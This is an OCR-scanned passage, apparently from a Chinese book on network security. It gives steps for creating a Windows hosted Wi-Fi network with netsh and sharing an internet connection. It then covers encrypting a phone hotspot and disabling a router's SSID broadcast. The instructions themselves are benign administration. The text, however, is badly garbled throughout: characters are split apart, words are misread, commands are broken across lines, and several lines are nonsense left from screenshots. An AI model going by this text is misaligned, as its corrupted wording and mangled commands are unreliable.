人 身份 验 证 和 窜 辜 : 
step 园 使 用 命令 “netsh wlan set hostednetwork 
mode=allow ssid=wifi key=12345678” 创 建 
一 个 无 线 AP， 该 命令 用 于 创建 一 个 名 称 为 
W 井 ， 连 接 密码 为 “12345678” 的 无 线 网 络 ， 
如 下 图 所 示 。 


无 v 
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而 等 理 员 : CNwindows\system32Vmd .exe 和 过、 如 党 


:\Users\Administratornetsh wlan set hostednetw 
rk 网 由 其 8 key=12345678 


起 
站 Par. 


:\Users\Administrator> 


使 用 netsh wlan start hostednetwork 命 
令 ， 启 用 创建 好 的 无 线 网 络 ， 如 下 图 所 示 。 


画 管理 员 : C\windows\system32\cm. 一 口 x 


号 


:\Users\Administrator>netsh wlan start host 
dnetwork 


已 启动 认 载 网 络 。 


:\Users\Administrator> 


v 


[Se 图 单 去 桌面 上 的 “开始 ”按钮 ， 在 弹出 
的 界面 中 单 击 “ 设 置 ”按钮 ， 如 下 图 所 示 。 


打开 “设置 ”对 话 框 ， 在 其 中 选择 “网 
络 和 Intemet” 选 项 ， 如 下 图 所 示 。 


手机 
[DD Stead is phone 


网 络 和 Internet B 
Wi-F、 飞 村 式 、VPN 


[EE 国 打开 “网 络 状态 ”对 话 框 ， 单 击 右 下 
方 的 “网 络 和 共享 中 心 ” 超 链接 ， 如 下 图 
所 示 。 


step 图 打开 “网 络 和 共享 中 心 ”对 话 框 ， 单 
击 “ 更 改 适配器 设置 ”起 链接 ， 如 下 图 所 示 。 
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[step 图 打开 “网 络 连接 ”对 话 框 ， 在 其 中 可 
以 看 到 多 出 来 的 “本 地 连接 *3” 图 标 ， 如 
下 图 所 示 。 


最 ma 这 于 = -总 % 


全 节 “RE-，RE 和 ~ 已。 这 同属- 放 
TR mal) EV) RGN) TAM 
多 织 > 。 这 人 E 到 。 要 用 此 网 络 设 备 。 > E-me 


2 日 。 全 和 1 人 项 


选择 接 入 外 网 的 网 络 图 标 , 这 里 以 “以 
太 网 2” 有 线 网 络 为 例 ,选中 以 太 网 2 并 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “属性 ”菜单 命令 ， 


如 下 图 所 示 。 
E77 2 
+ BR 5 
tn MAD EV AN IRD 
me RRs warss » -IO 


第 13 章 无 线路 由 器 及 密码 的 安全 防护 


step 图 打开 “属性 ”对 话 框 ， 切 换 到 “共享 ” 
选项 卡 ， 在 “家 庭 网 络 连接 ”下 拉 列 表 中 
找到 “本 地 连接 *3” 并 选中 ， 如 下 图 所 示 。 


网 次 ”共享 
Internet 连接 共享 


回 区 许 其 他 网 络 用 户 通 过 此 计算 机 的 Internet 连接 来 连接 (N) 


[step 图 选择 完成 后 ， 单 击 “ 确 定 ”按钮 ， 这 
样 便 可 以 创建 一 个 虚拟 AP， 如 下 图 所 示 。 


网 络 ”共享 


Internet 连接 共享 


回 允许 其 他 网 阁 用 户 通 过 此 计算 机 的 Internet 连接 来 连接 (N) 


家 庭 网 络 连接 (H): 
本 地 连接 * 3 ~ 


回 允许 其 他 网 络 用 广 控制 或 禁用 共享 的 Internet 连接 (O) 


设置 (G)… 


13.6 ”小 试 身手 
练习 1: 开启 并 加 密 手机 WLAN 热 点 


为 保证 手机 的 安全 ， 一 般 需 要 给 手机 吴 


的 WLAN 热点 功能 添加 密码 ， 有 具体 的 操作 
步骤 如 下 。 


step 图 打开 手机 ， 进 入 手机 的 设置 界面 ， 在 
其 中 点 按 “ 便 携 式 WLAN 热点 ”， 开 启 手 
机 的 便携 式 WLAN 热点 功能 ， 如 下 图 所 示 。 
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”黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


Eee 图 在 手机 的 “移动 热点 ”设置 界面 中 ， 
点 按 “ 配 置 WLAN 热点 ”功能 ， 在 弹出 的 


界面 中 点 按 “ 开 放 ” 选 项 ， 可 以 选择 手机 
设备 的 加 密 方式 ， 如 下 图 所 示 。 


HUAWEI C8815 
开放 

开放 

WPA PSK 


WPA2 PSK 


选择 好 加 密 方式 后 ， 即 可 在 下 方 显示 
密码 输入 框 , 在 其 中 输入 密码 , 然后 单 击 “ 保 
存 ” 按 钮 即 可 ， 如 下 图 所 示 。 


Step| 


HUAWEI C8815 


WPAPSK 
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step 国 加 密 完 成 后 ， 使 用 计算 机 再 连接 手机 
设备 时 ， 系 统 提示 用 户 输入 网 络 安全 密 钥 ， 
如 下 图 所 示 。 


[后 EAE C8815 


输入 网 络 安全 窗 钥 


面 与 


练习 2: 关闭 无 线路 由 器 的 广播 功能 


路 由 器 的 无 线 广播 功能 在 给 用 户 带 来 

方便 的 同时 ， 也 给 用 户 带 来 了 安全 隐患 ， 
因此 ， 在 不 用 无 线 功 能 的 时 候 ， 要 将 路 由 
器 的 无 线 功 能 关闭 掉 ， 具 体 的 操作 步骤 
如 下 。 
[sep 国 打开 无 线路 由 器 的 Web 后 台 设置 界 
面 ， 在 其 中 选择 “无 线 设置 ”选项 下 的 “ 基 
本 设置 ”选项 ， 即 可 在 右 侧 的 窗 格 中 显示 
无 线 网 络 的 基本 设置 信息 ， 如 下 图 所 示 。 
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TIP-LINK [一 天天 村 访 闪 一 雹 到 无 全 自由 生 服 苔 烟 


step 图 取消 选中 的 “开启 无 线 功能 ”和 “ 开 


启 SSID 广播 ”两 个 复 选 框 ， 最 后 单 击 “ 保 
存 ” 按 钮 , 即 可 关闭 路 由 器 的 无 线 广播 功能 ， 
如 下 图 所 示 。 
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